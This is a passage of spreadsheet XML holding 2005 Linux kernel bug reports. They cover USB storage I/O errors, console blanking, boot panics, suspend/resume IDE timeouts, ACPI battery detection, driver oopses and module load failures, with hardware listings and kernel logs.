b8 60 43 36 c0 e8 14 a2 17 00</t>
  </si>
  <si>
    <t>I/o errors when trying to write to usb mp3 player philips hdd065 with kernel 2.6.11 (but not with 2.4.22)</t>
  </si>
  <si>
    <t>2.6.11-7mdk</t>
  </si>
  <si>
    <t>2005-04-30 22:26 UTC</t>
  </si>
  <si>
    <t>Marco Antonucci</t>
  </si>
  <si>
    <t>2005-06-01 14:45 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake Linux 10.1 Hardware Environment: # lsusb Bus 001 Device 005: ID 0471:1137 Philips Bus 001 Device 003: ID 06b9:4061 Alcatel Telecom Speed Touch ISDN or ADSL Modem Bus 001 Device 002: ID 03eb:3301 Atmel Corp. 4-port Hub Bus 001 Device 001: ID 0000:0000 # cat /proc/bus/usb/devices T: Bus=01 Lev=00 Prnt=00 Port=00 Cnt=00 Dev#= 1 Spd=12 MxCh= 4 B: Alloc= 0/900 us ( 0%), #Int= 1, #Iso= 0 D: Ver= 1.10 Cls=09(hub ) Sub=00 Prot=00 MxPS= 8 #Cfgs= 1 P: Vendor=0000 ProdID=0000 Rev= 2.06 S: Manufacturer=Linux 2.6.11-7mdk ohci_hcd S: Product=OHCI Host Controller S: SerialNumber=0000:00:02.0 C:* #Ifs= 1 Cfg#= 1 Atr=c0 MxPwr= 0mA I: If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) MxPS= 2 Ivl=255ms T: Bus=01 Lev=01 Prnt=01 Port=00 Cnt=01 Dev#= 2 Spd=12 MxCh= 4 D: Ver= 1.10 Cls=09(hub ) Sub=00 Prot=00 MxPS= 8 #Cfgs= 1 P: Vendor=03eb ProdID=3301 Rev= 3.00 S: Product=Standard USB Hub C:* #Ifs= 1 Cfg#= 1 Atr=e0 MxPwr= 64mA I: If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) MxPS= 1 Ivl=255ms T: Bus=01 Lev=02 Prnt=02 Port=00 Cnt=01 Dev#= 5 Spd=12 MxCh= 0 D: Ver= 1.10 Cls=00(&gt;ifc ) Sub=00 Prot=00 MxPS= 8 #Cfgs= 1 P: Vendor=0471 ProdID=1137 Rev= 1.00 S: Manufacturer=Philips S: Product=Mass Storage Device C:* #Ifs= 1 Cfg#= 1 Atr=c0 MxPwr= 0mA I: If#= 0 Alt= 0 #EPs= 2 Cls=08(stor.) Sub=06 Prot=50 Driver=(none) E: Ad=03(O) Atr=02(Bulk) MxPS= 64 Ivl=0ms E: Ad=83(I) Atr=02(Bulk) MxPS= 64 Ivl=0ms T: Bus=01 Lev=01 Prnt=01 Port=01 Cnt=02 Dev#= 3 Spd=12 MxCh= 0 D: Ver= 1.10 Cls=ff(vend.) Sub=00 Prot=00 MxPS= 8 #Cfgs= 1 P: Vendor=06b9 ProdID=4061 Rev= 0.00 S: Manufacturer=ALCATEL S: Product=Speed Touch USB S: SerialNumber=0090D02BA9F1 C:* #Ifs= 3 Cfg#= 1 Atr=80 MxPwr=500mA I: If#= 0 Alt= 0 #EPs= 1 Cls=ff(vend.) Sub=00 Prot=00 Driver=usbfs E: Ad=81(I) Atr=03(Int.) MxPS= 16 Ivl=50ms I: If#= 1 Alt= 0 #EPs= 0 Cls=ff(vend.) Sub=00 Prot=00 Driver=usbfs I: If#= 1 Alt= 1 #EPs= 3 Cls=ff(vend.) Sub=00 Prot=00 Driver=usbfs E: Ad=06(O) Atr=02(Bulk) MxPS= 64 Ivl=0ms E: Ad=07(O) Atr=02(Bulk) MxPS= 64 Ivl=0ms E: Ad=87(I) Atr=02(Bulk) MxPS= 64 Ivl=0ms I: If#= 1 Alt= 2 #EPs= 3 Cls=ff(vend.) Sub=00 Prot=00 Driver=usbfs E: Ad=06(O) Atr=02(Bulk) MxPS= 32 Ivl=0ms E: Ad=07(O) Atr=02(Bulk) MxPS= 32 Ivl=0ms E: Ad=87(I) Atr=02(Bulk) MxPS= 64 Ivl=0ms I: If#= 1 Alt= 3 #EPs= 3 Cls=ff(vend.) Sub=00 Prot=00 Driver=usbfs E: Ad=06(O) Atr=02(Bulk) MxPS= 16 Ivl=0ms E: Ad=07(O) Atr=02(Bulk) MxPS= 16 Ivl=0ms E: Ad=87(I) Atr=02(Bulk) MxPS= 64 Ivl=0ms I: If#= 2 Alt= 0 #EPs= 2 Cls=ff(vend.) Sub=00 Prot=00 Driver=(none) E: Ad=05(O) Atr=02(Bulk) MxPS= 8 Ivl=0ms E: Ad=85(I) Atr=02(Bulk) MxPS= 8 Ivl=0ms Software Environment: Problem Description: the mp3 player (hard-disk based) is correctly recognized by hotplug and mounts just fine: [from /var/log/messages:] May 1 07:03:54 localhost kernel: Initializing USB Mass Storage driver...May 1 07:03:54 localhost kernel: scsi1 : SCSI emulation for USB Mass Storage devices May 1 07:03:54 localhost kernel: usbcore: registered new driver usb-storage May 1 07:03:54 localhost kernel: USB Mass Storage support registered. May 1 07:03:59 localhost kernel: Vendor: Philips Model: MassStorage-Disc Rev: May 1 07:03:59 localhost kernel: Type: Direct-Access ANSI SCSI revision: 00 May 1 07:03:59 localhost kernel: SCSI device sda: 3939265 512-byte hdwr sectors (2017 MB) May 1 07:03:59 localhost kernel: sda: Write Protect is off May 1 07:03:59 localhost kernel: sda: assuming drive cache: write through May 1 07:04:02 localhost kernel: /dev/scsi/host1/bus0/target0/lun0: p1 May 1 07:04:02 localhost kernel: Attached scsi removable disk sda at scsi1, channel 0, id 0, lun 0 May 1 07:04:02 localhost scsi.agent[28735]: disk at /devices/pci0000:00/0000:00:02.0/usb1/1-1/1-1.1/1-1.1:1.0/host1/target1:0:0/1:0:0:0 May 1 07:04:03 localhost perl: drakupdate_fstab called with --auto --add /dev/sda1 # mount /dev/hda2 on / type ext3 (rw) none on /proc type proc (rw) none on /proc/bus/usb type usbfs (rw) none on /sys type sysfs (rw) /dev/hda3 on /mnt/C type ntfs (ro,noexec,nosuid,nodev,users,umask=0022) /dev/hda4 on /mnt/D type vfat (rw,nosuid,nodev,codepage=850,gid=503,conv=auto,uid=501,umask=0,iocharset=iso8859-15) none on /mnt/floppy type supermount (rw,sync,dev=/dev/fd0,fs=ext2:vfat,--,codepage=850,iocharset=iso8859-15,umask=0) /dev/hdd1 on /mnt/backup type ext3 (rw) /dev/sda1 on /mnt/removable type vfat (rw,noexec,nosuid,nodev,sync,users,umask=0,iocharset=iso8859-15,codepage=850) but when i try to write any data on it i get these results: # cp sarge* /mnt/removable/ cp: scrittura di `/mnt/removable/sarge-i386-netinst.iso': Input/output error [from /var/log/messages:] May 1 07:11:53 localhost kernel: SCSI error : &lt;1 0 0 0&gt; return code = 0x70000 May 1 07:11:53 localhost kernel: end_request: I/O error, dev sda, sector 81223 May 1 07:11:53 localhost kernel: Buffer I/O error on device sda1, logical block 81160 May 1 07:11:53 localhost kernel: lost page write due to I/O error on sda1 May 1 07:11:53 localhost kernel: SCSI error : &lt;1 0 0 0&gt; return code = 0x70000 May 1 07:11:53 localhost kernel: end_request: I/O error, dev sda, sector 81224 May 1 07:11:53 localhost kernel: Buffer I/O error on device sda1, logical block 81161 May 1 07:11:53 localhost kernel: lost page write due to I/O error on sda1 May 1 07:11:53 localhost kernel: SCSI error : &lt;1 0 0 0&gt; return code = 0x70000 May 1 07:11:53 localhost kernel: end_request: I/O error, dev sda, sector 81225 May 1 07:11:53 localhost kernel: Buffer I/O error on device sda1, logical block 81162 May 1 07:11:53 localhost kernel: lost page write due to I/O error on sda1 May 1 07:11:53 localhost kernel: SCSI error : &lt;1 0 0 0&gt; return code = 0x70000 May 1 07:11:53 localhost kernel: end_request: I/O error, dev sda, sector 81226 May 1 07:11:53 localhost kernel: Buffer I/O error on device sda1, logical block 81163 May 1 07:11:53 localhost kernel: lost page write due to I/O error on sda1 May 1 07:11:53 localhost kernel: SCSI error : &lt;1 0 0 0&gt; return code = 0x70000 May 1 07:11:53 localhost kernel: end_request: I/O error, dev sda, sector 81227 May 1 07:11:53 localhost kernel: Buffer I/O error on device sda1, logical block 81164 May 1 07:11:53 localhost kernel: lost page write due to I/O error on sda1 May 1 07:11:54 localhost kernel: SCSI error : &lt;1 0 0 0&gt; return code = 0x70000 May 1 07:11:54 localhost kernel: end_request: I/O error, dev sda, sector 81228 May 1 07:11:54 localhost kernel: Buffer I/O error on device sda1, logical block 81165 May 1 07:11:54 localhost kernel: lost page write due to I/O error on sda1 May 1 07:11:54 localhost kernel: SCSI error : &lt;1 0 0 0&gt; return code = 0x70000 May 1 07:11:54 localhost kernel: end_request: I/O error, dev sda, sector 81229 May 1 07:11:54 localhost kernel: Buffer I/O error on device sda1, logical block 81166 May 1 07:11:54 localhost kernel: lost page write due to I/O error on sda1 May 1 07:11:54 localhost kernel: SCSI error : &lt;1 0 0 0&gt; return code = 0x70000 May 1 07:11:54 localhost kernel: end_request: I/O error, dev sda, sector 81230 May 1 07:11:54 localhost kernel: Buffer I/O error on device sda1, logical block 81167 May 1 07:11:54 localhost kernel: lost page write due to I/O error on sda1 Steps to reproduce: mount the player and try to write some data on it. this problem never occured with 2.4.22 kernel. Thanks!</t>
  </si>
  <si>
    <t>vesafb, Console goes black after some time of inactivity, but does not put monitor in standby</t>
  </si>
  <si>
    <t>2005-05-01 13:16 UTC</t>
  </si>
  <si>
    <t>Bruno Prémont</t>
  </si>
  <si>
    <t>2005-08-31 01:12 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Does not matter, all my computers have same problem Software Environment: Problem Description: After some time of inactivity the console goes black, but does not put monitor into standby mode (this works in X with driver for the card, have not tried with vesa driver in X) What I would expect is that the monitor is put in stand-by when the console goes blank. (Tweaking with fbset does not help) Steps to reproduce: Work on linux console (not under X ;-)), then keep away from keyboard/mouse for some time.</t>
  </si>
  <si>
    <t>kernel panic (segmentation fault) unable to boot Live/ Installation  CD</t>
  </si>
  <si>
    <t>&gt;=2.6.8</t>
  </si>
  <si>
    <t>2005-05-01 13:39 UTC</t>
  </si>
  <si>
    <t>Markus Sommer</t>
  </si>
  <si>
    <t>2005-10-10 12:58 UTC</t>
  </si>
  <si>
    <t>Distribution: Knoppix 3.7, SuSE 9.2 &amp; 9.3 Hardware Enviroment: AMD 1700XP, Abit KtTARAID Motherboard with latest BIOS Update 2002, 512 MB SDRAM, 40 GB HD, NVIDIA graphic Card ASUS MX400, PIONEER DVD-ROM 106, LiteOn CD Burner LTR-16102B, TEAC Floppy Software Enviroment: Not able to boot LiveCD or Installation-DVD Problem Discription: No Problems up to Kernel 2.6.4, if Kernel &gt; 2.6.5 get Kernel Panic: Segmentation fault or not syncing Steps to reproduce: Always when starting Installation-CD, Live-CD or Rescue-System-CD I have tried this to avoid the problem: Load BIOS failsafe parameters, BIOS Update, formating and parting harddisk, test SuSE rescue system in text mode Failure message: kernel BUG at mm/page_alloc.c:3151 Invalid Operand: 0000 [#1] PREEMPT SMP Modules linked in: cloop sbp2 ohci1394 ieee1394 ub usb_storage ochi_hcd uhci_hcd usbcore tmscsin ide_scsi CPU: 0 EIP: 0060:[&lt;c013cf9c&gt;] Not tainted VLI EFLAGS: 00020002 (2.6.9) EIPP is at at __rmqueue+0x100/0x10c .... &lt;6&gt;note: sed [737] exitd with preempt_count 2 Segmentation fault i hope you can resolve the bug, thanks</t>
  </si>
  <si>
    <t>hda: lost interrupt when resuming from S3 - Sony VGN-T1XP</t>
  </si>
  <si>
    <t>Hibernation/Suspend</t>
  </si>
  <si>
    <t>2005-05-03 09:07 UTC</t>
  </si>
  <si>
    <t>2010-11-26 14:37 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Sony Vaio VGN-T1XP Software Environment: Problem Description: When resumung from S3, I get the follwing error: Stopping tasks: ==============================================| Back to C! Warning: CPU frequency is 600000, cpufreq assumed 1100000 kHz. ACPI: PCI Interrupt 0000:00:1f.1[A]: no GSI ACPI: PCI Interrupt 0000:00:1f.5[B] -&gt; Link [LNKB] -&gt; GSI 9 (level, low) -&gt; IRQ 9 PCI: Setting latency timer of device 0000:00:1f.5 to 64 e100: eth0: e100_watchdog: link up, 100Mbps, full-duplex MCE: The hardware reports a non fatal, correctable incident occurred on CPU 0. Bank 1: f200000000000115 hda: lost interrupt ACPI-0299: *** Error: No installed handler for fixed event [00000002] Restarting tasks... done ALPS Touchpad (Glidepoint) detected Enabling hardware tapping input: AlpsPS/2 ALPS TouchPad on isa0060/serio1 hda: dma_timer_expiry: dma status == 0x21 hda: DMA timeout error hda: dma timeout error: status=0x50 { DriveReady SeekComplete } ide: failed opcode was: unknown hda: status error: status=0x50 { DriveReady SeekComplete } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE hda: status error: status=0x50 { DriveReady SeekComplete } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE hda: lost interrupt hda: status error: status=0x50 { DriveReady SeekComplete } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE hda: status error: status=0x50 { DriveReady SeekComplete } ide: failed opcode was: unknown hda: no DRQ after issuing MULTWRITE ide0: reset: success Steps to reproduce: echo -n mem &gt; /sys/power/state I have updated to ACPI-patches: Subsystem revision 20050408 After a certain ammount of waiting, I can resume my work. I hope I have attached all needed information, otherwise, just tell me.</t>
  </si>
  <si>
    <t>AE_TIME - Battery not recognized at bootup - PCG-FR215E</t>
  </si>
  <si>
    <t>2.6.8.11</t>
  </si>
  <si>
    <t>2005-05-06 09:23 UTC</t>
  </si>
  <si>
    <t>2006-02-02 14:32 UTC</t>
  </si>
  <si>
    <t>3750 5236</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: Sony PCG-FR215E Software Environment: kernel 2.6.8.11 + lastest acpi patch!! Problem Description: The battery is randomly recognized at boot time! This is already a long-standing bug (from 2.6.8 on) brice@TuxBox:~$ dmesg|grep ACPI BIOS-e820: 000000001fef0000 - 000000001fefc000 (ACPI data) BIOS-e820: 000000001fefc000 - 000000001ff00000 (ACPI NVS) ACPI: RSDP (v000 PTLTD ) @ 0x000f6890 ACPI: RSDT (v001 SONY K5 0x06040000 LTP 0x00000000) @ 0x1fef7647 ACPI: FADT (v001 SONY K5 0x06040000 PTL_ 0x000f4240) @ 0x1fefbdff ACPI: BOOT (v001 PTLTD $SBFTBL$ 0x06040000 LTP 0x00000001) @ 0x1fefbe73 ACPI: SSDT (v001 PTLTD POWERNOW 0x06040000 LTP 0x00000001) @ 0x1fefbe9b ACPI: DSDT (v001 SONY X0 0x06040000 MSFT 0x0100000e) @ 0x00000000 ACPI: PM-Timer IO Port: 0x8008 ACPI: setting ELCR to 0200 (from 0a00) ACPI: Subsystem revision 20050408 ACPI: Interpreter enabled ACPI: Using PIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (0000:00) ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 9 10 11 12) *0, disabled. ACPI: PCI Interrupt Link [LNKB] (IRQs *9 10 11 12) ACPI: PCI Interrupt Link [LNKC] (IRQs 9 10 *11 12) ACPI: PCI Interrupt Link [LNKD] (IRQs *9 10 11 12) ACPI: Embedded Controller [EC0] (gpe 1) ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PPB_._PRT] pnp: PnP ACPI init pnp: PnP ACPI: found 10 devices PnPBIOS: Disabled by ACPI PNP PCI: Using ACPI for IRQ routing ACPI wakeup devices: ACPI: (supports S0 S3 S4 S5) ACPI: PCI Interrupt Link [LNKA] enabled at IRQ 11 ACPI: PCI Interrupt 0000:00:11.1[A] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: CPU0 (power states: C1[C1] C2[C2]) ACPI: Processor [CPU0] (supports 16 throttling states) ACPI: PCI Interrupt 0000:00:0e.0[A] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI Interrupt Link [LNKB] enabled at IRQ 9 ACPI: PCI Interrupt 0000:00:0e.1[B] -&gt; Link [LNKB] -&gt; GSI 9 (level, low) -&gt; IRQ 9 ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 11 ACPI: PCI Interrupt 0000:00:0e.2[C] -&gt; Link [LNKC] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI Interrupt 0000:00:0c.0[A] -&gt; Link [LNKB] -&gt; GSI 9 (level, low) -&gt; IRQ 9 ACPI: PCI Interrupt 0000:00:10.0[A] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI Interrupt 0000:00:10.1[B] -&gt; Link [LNKB] -&gt; GSI 9 (level, low) -&gt; IRQ 9 ACPI: PCI Interrupt 0000:00:10.2[C] -&gt; Link [LNKC] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI Interrupt Link [LNKD] enabled at IRQ 9 ACPI: PCI Interrupt 0000:00:10.3[D] -&gt; Link [LNKD] -&gt; GSI 9 (level, low) -&gt; IRQ 9 ACPI: PCI Interrupt 0000:00:11.5[C] -&gt; Link [LNKC] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: PCI Interrupt 0000:02:00.0[A] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ACPI: Battery Slot [BAT1] (battery absent) ACPI: AC Adapter [ACAD] (on-line) ACPI: Power Button (FF) [PWRF] ACPI: Sleep Button (CM) [SBTN] ACPI: Power Button (CM) [PBTN] ACPI: Lid Switch [LID] ACPI: Thermal Zone [THRM] (62 C) ACPI: PCI Interrupt 0000:01:00.0[A] -&gt; Link [LNKC] -&gt; GSI 11 (level, low) -&gt; IRQ 11 brice@TuxBox:~$ Regards, Brice</t>
  </si>
  <si>
    <t>USB driver visor produces kernel oops when syncing with Palm</t>
  </si>
  <si>
    <t>2005-05-06 15:25 UTC</t>
  </si>
  <si>
    <t>2005-05-06 15:31 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sid with self compiled kernel 2.6.11.7. Compiled with gcc-3.3.5. Hardware Environment: CPU: mobile Athlon XP 1800+ Mainboard: ABit NF7S V2.0 lspci -v output: 0000:00:00.0 Host bridge: nVidia Corporation nForce2 AGP (different version?) (rev c1) Subsystem: ABIT Computer Corp.: Unknown device 1c00 Flags: bus master, 66MHz, fast devsel, latency 0 Memory at d0000000 (32-bit, prefetchable) [size=64M] Capabilities: [40] AGP version 2.0 Capabilities: [60] #08 [2001] 0000:00:00.1 RAM memory: nVidia Corporation nForce2 Memory Controller 1 (rev c1) Subsystem: nVidia Corporation: Unknown device 0c17 Flags: 66MHz, fast devsel 0000:00:00.2 RAM memory: nVidia Corporation nForce2 Memory Controller 4 (rev c1) Subsystem: nVidia Corporation: Unknown device 0c17 Flags: 66MHz, fast devsel 0000:00:00.3 RAM memory: nVidia Corporation nForce2 Memory Controller 3 (rev c1) Subsystem: nVidia Corporation: Unknown device 0c17 Flags: 66MHz, fast devsel 0000:00:00.4 RAM memory: nVidia Corporation nForce2 Memory Controller 2 (rev c1) Subsystem: nVidia Corporation: Unknown device 0c17 Flags: 66MHz, fast devsel 0000:00:00.5 RAM memory: nVidia Corporation nForce2 Memory Controller 5 (rev c1) Subsystem: nVidia Corporation: Unknown device 0c17 Flags: 66MHz, fast devsel 0000:00:01.0 ISA bridge: nVidia Corporation nForce2 ISA Bridge (rev a4) Subsystem: ABIT Computer Corp.: Unknown device 1c00 Flags: bus master, 66MHz, fast devsel, latency 0 Capabilities: [48] #08 [01e1] 0000:00:01.1 SMBus: nVidia Corporation nForce2 SMBus (MCP) (rev a2) Subsystem: ABIT Computer Corp.: Unknown device 1c00 Flags: 66MHz, fast devsel, IRQ 10 I/O ports at c400 [size=32] Capabilities: [44] Power Management version 2 0000:00:02.0 USB Controller: nVidia Corporation nForce2 USB Controller (rev a4) (prog-if 10 [OHCI]) Subsystem: ABIT Computer Corp.: Unknown device 1c00 Flags: bus master, 66MHz, fast devsel, latency 0, IRQ 22 Memory at e1087000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 0000:00:02.1 USB Controller: nVidia Corporation nForce2 USB Controller (rev a4) (prog-if 10 [OHCI]) Subsystem: ABIT Computer Corp.: Unknown device 1c00 Flags: bus master, 66MHz, fast devsel, latency 0, IRQ 21 Memory at e1082000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 0000:00:02.2 USB Controller: nVidia Corporation nForce2 USB Controller (rev a4) (prog-if 20 [EHCI]) Subsystem: ABIT Computer Corp.: Unknown device 1c00 Flags: bus master, 66MHz, fast devsel, latency 0, IRQ 20 Memory at e1083000 (32-bit, non-prefetchable) [size=256] Capabilities: [44] #0a [2080] Capabilities: [80] Power Management version 2 0000:00:04.0 Ethernet controller: nVidia Corporation nForce2 Ethernet Controller (rev a1) Subsystem: ABIT Computer Corp.: Unknown device 1c00 Flags: bus master, 66MHz, fast devsel, latency 0, IRQ 22 Memory at e1086000 (32-bit, non-prefetchable) [size=4K] I/O ports at b000 [size=8] Capabilities: [44] Power Management version 2 0000:00:05.0 Multimedia audio controller: nVidia Corporation nForce MultiMedia audio [Via VT82C686B] (rev a2) Subsystem: ABIT Computer Corp.: Unknown device 1c00 Flags: bus master, 66MHz, fast devsel, latency 0, IRQ 5 Memory at e1000000 (32-bit, non-prefetchable) [size=512K] Capabilities: [44] Power Management version 2 0000:00:06.0 Multimedia audio controller: nVidia Corporation nForce2 AC97 Audio Controler (MCP) (rev a1) Subsystem: ABIT Computer Corp.: Unknown device 1c00 Flags: bus master, 66MHz, fast devsel, latency 0, IRQ 21 I/O ports at b400 [size=256] I/O ports at b800 [size=128] Memory at e1080000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 0000:00:08.0 PCI bridge: nVidia Corporation nForce2 External PCI Bridge (rev a3) (prog-if 00 [Normal decode]) Flags: bus master, 66MHz, fast devsel, latency 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=32 I/O behind bridge: 00009000-0000afff Memory behind bridge: df000000-e0ffffff Prefetchable memory behind bridge: dc000000-dcffffff 0000:00:09.0 IDE interface: nVidia Corporation nForce2 IDE (rev a2) (prog-if 8a [Master SecP PriP]) Subsystem: ABIT Computer Corp.: Unknown device 1c00 Flags: bus master, 66MHz, fast devsel, latency 0 I/O ports at f000 [size=16] Capabilities: [44] Power Management version 2 0000:00:0d.0 FireWire (IEEE 1394): nVidia Corporation nForce2 FireWire (IEEE 1394) Controller (rev a3) (prog-if 10 [OHCI]) Subsystem: ABIT Computer Corp.: Unknown device 1c00 Flags: bus master, 66MHz, fast devsel, latency 0, IRQ 10 Memory at e1084000 (32-bit, non-prefetchable) [size=2K] Memory at e1085000 (32-bit, non-prefetchable) [size=64] Capabilities: [44] Power Management version 2 0000:00:1e.0 PCI bridge: nVidia Corporation nForce2 AGP (rev c1) (prog-if 00 [Normal decode]) Flags: bus master, 66MHz, medium devsel, latency 32 Bus: primary=00, secondary=02, subordinate=02, sec-latency=32 Memory behind bridge: dd000000-deffffff Prefetchable memory behind bridge: d4000000-dbffffff 0000:01:07.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 02) Flags: bus master, medium devsel, latency 32, IRQ 19 Memory at dc000000 (32-bit, prefetchable) [size=4K] 0000:01:07.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 02) Flags: bus master, medium devsel, latency 32, IRQ 19 Memory at dc001000 (32-bit, prefetchable) [size=4K] 0000:01:0b.0 RAID bus controller: Silicon Image, Inc. (formerly CMD Technology Inc) SiI 3112 [SATALink/SATARaid] Serial ATA Controller (rev 02) Subsystem: Silicon Image, Inc. (formerly CMD Technology Inc) Asus A7N8X Flags: bus master, 66MHz, medium devsel, latency 32, IRQ 11 I/O ports at 9000 [size=8] I/O ports at 9400 [size=4] I/O ports at 9800 [size=8] I/O ports at 9c00 [size=4] I/O ports at a000 [size=16] Memory at e0000000 (32-bit, non-prefetchable) [size=512] Capabilities: [60] Power Management version 2 0000:02:00.0 VGA compatible controller: nVidia Corporation NV25 [GeForce4 Ti 4200] (rev a3) (prog-if 00 [VGA]) Flags: bus master, 66MHz, medium devsel, latency 248, IRQ 19 Memory at dd000000 (32-bit, non-prefetchable) [size=16M] Memory at d4000000 (32-bit, prefetchable) [size=64M] Memory at d8000000 (32-bit, prefetchable) [size=512K] Capabilities: [60] Power Management version 2 Capabilities: [44] AGP version 2.0 Software Environment: Loaded drivers: Module Size Used by visor 19468 0 usbserial 30568 1 visor nls_iso8859_15 4736 0 nls_cp850 4992 0 vfat 14464 0 fat 41628 1 vfat sd_mod 16528 0 rfcomm 41884 1 l2cap 28420 5 rfcomm bluetooth 53508 4 rfcomm,l2cap snd_seq_oss 35840 0 snd_seq_midi_event 8320 1 snd_seq_oss snd_seq 55952 4 snd_seq_oss,snd_seq_midi_event snd_seq_device 8972 2 snd_seq_oss,snd_seq snd_pcm_oss 53792 0 snd_mixer_oss 20480 1 snd_pcm_oss snd_bt87x 15432 0 snd_intel8x0 33856 2 snd_ac97_codec 77688 1 snd_intel8x0 snd_pcm 95880 4 snd_pcm_oss,snd_bt87x,snd_intel8x0,snd_ac97_codec snd_timer 26628 2 snd_seq,snd_pcm snd 57828 14 snd_seq_oss,snd_seq,snd_seq_device,snd_pcm_oss,snd_mixer_oss,snd_bt87x,snd_intel8x0,snd_ac97_codec,snd_pcm,snd_timer snd_page_alloc 10116 3 snd_bt87x,snd_intel8x0,snd_pcm nvidia 3923964 12 8250_pnp 8704 0 8250 25252 1 8250_pnp serial_core 23808 1 8250 sata_sil 8836 0 libata 48388 1 sata_sil forcedeth 19584 0 joydev 9792 0 usbhid 26880 0 evdev 9472 0 binfmt_misc 12040 1 lp 11204 0 parport_pc 41796 1 parport 37832 2 lp,parport_pc autofs4 20356 2 nvidia_agp 7964 1 agpgart 35112 2 nvidia,nvidia_agp 3c59x 42152 0 mii 5248 1 3c59x tuner 22948 0 tvaudio 23716 0 bttv 155216 0 firmware_class 10880 1 bttv tveeprom 13336 1 bttv video_buf 22404 1 bttv v4l2_common 6016 1 bttv btcx_risc 5000 1 bttv w83627hf 30504 0 eeprom 7696 0 i2c_sensor 3840 2 w83627hf,eeprom i2c_isa 2176 0 i2c_nforce2 6784 0 i2c_algo_bit 9992 1 bttv i2c_core 23312 10 tuner,tvaudio,bttv,tveeprom,w83627hf,eeprom,i2c_sensor,i2c_isa,i2c_nforce2,i2c_algo_bit videodev 10112 1 bttv soundcore 10464 1 snd thermal 13576 0 processor 23220 1 thermal button 6800 0 usb_storage 71232 0 scsi_mod 95176 3 sd_mod,libata,usb_storage ehci_hcd 49544 0 ohci_hcd 36488 0 usbcore 138232 7 visor,usbserial,usbhid,usb_storage,ehci_hcd,ohci_hcd floppy 59216 0 ide_cd 41988 0 cdrom 41376 1 ide_cd rtc 13496 0 Problem Description: When I try to sync my Palm with my PC the PC always freezes after several kB of data have been transfered. dmesg output: Please see attached picture! Steps to reproduce: Connect Palm, start pilot-xfer -p /ttyUSB1 -s ., press sync button -&gt; System freezer after some kB</t>
  </si>
  <si>
    <t>cx88_dvb fatal error: unknown symbox cx22702_attach</t>
  </si>
  <si>
    <t>2.6.12-rc4</t>
  </si>
  <si>
    <t>2005-05-07 06:35 UTC</t>
  </si>
  <si>
    <t>2005-05-08 20:57 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo (2005.0) Hardware Environment:AMD64 Software Environment: Problem Description: cx88_dvb (or cx88-dvb) will not load during boot or after boot in 2.6.12-rc4. (cx88_dvb works well in 2.6.12-rc3.). From a 2.6.12-rc4 console: modprobe cx88_dvb FATAL: Error inserting cx88_dvb (/lib/modules/2.6.12-rc4-rr01/kernel/drivers/media/video/cx88/cx88-dvb.ko): Unknown symbol in module, or unknown parameter (see dmesg) and from the end of the dmesg output: cx88_dvb: Unknown symbol cx22702_attach (note the '-rr01' in the modules path above is just my kernel configuration revision system) If more information is neede, please ask. Steps to reproduce: boot system see error about cx88_dvb in boot messages then try to manually 'modprobe cx88_dvb'</t>
  </si>
  <si>
    <t>Error inserting ebt_ulog</t>
  </si>
  <si>
    <t>2005-05-07 08:37 UTC</t>
  </si>
  <si>
    <t>Dmitry B. Khlonin</t>
  </si>
  <si>
    <t>2008-09-22 12:08 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing/unstable Hardware Environment: PIV, 512M RAM, 2 x 100 NIC Software Environment: module-init-tools=3.2-pre1-2 Problem Description: Trying to modprobe ebt_ulog, which compiled as module I receive next error: FATAL: Error inserting ebt_ulog (/lib/modules/2.6.11/kernel/net/bridge/netfilter/ebt_ulog.ko): Cannot allocate memory Empty in logs. Steps to reproduce: Compile ebt_ulog as module for kernel 2.6.11 and try to modprobe it, see what happens.</t>
  </si>
  <si>
    <t>Fail of frecuency on NSC Geode 233Mhz</t>
  </si>
  <si>
    <t>2005-05-08 11:35 UTC</t>
  </si>
  <si>
    <t>2005-08-12 09:22 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: allwell 3036-tv (nsc geode 233mhz) Software Environment:redhat 9.0 (2.6.11 no modules) Problem Description: Sometimes kernel fails to determine CPU frecuency. Sometimes I can see frecuency 697mhz and 1030 bogomips, imposible in this machine 233mhz Steps to reproduce: Sometimes you can look it in cpuinfo</t>
  </si>
  <si>
    <t>serio driver inconsistent use of  names</t>
  </si>
  <si>
    <t>2.6.11.8 with acpi and swsusp patches</t>
  </si>
  <si>
    <t>2005-05-09 15:05 UTC</t>
  </si>
  <si>
    <t>2005-08-31 08:24 UTC</t>
  </si>
  <si>
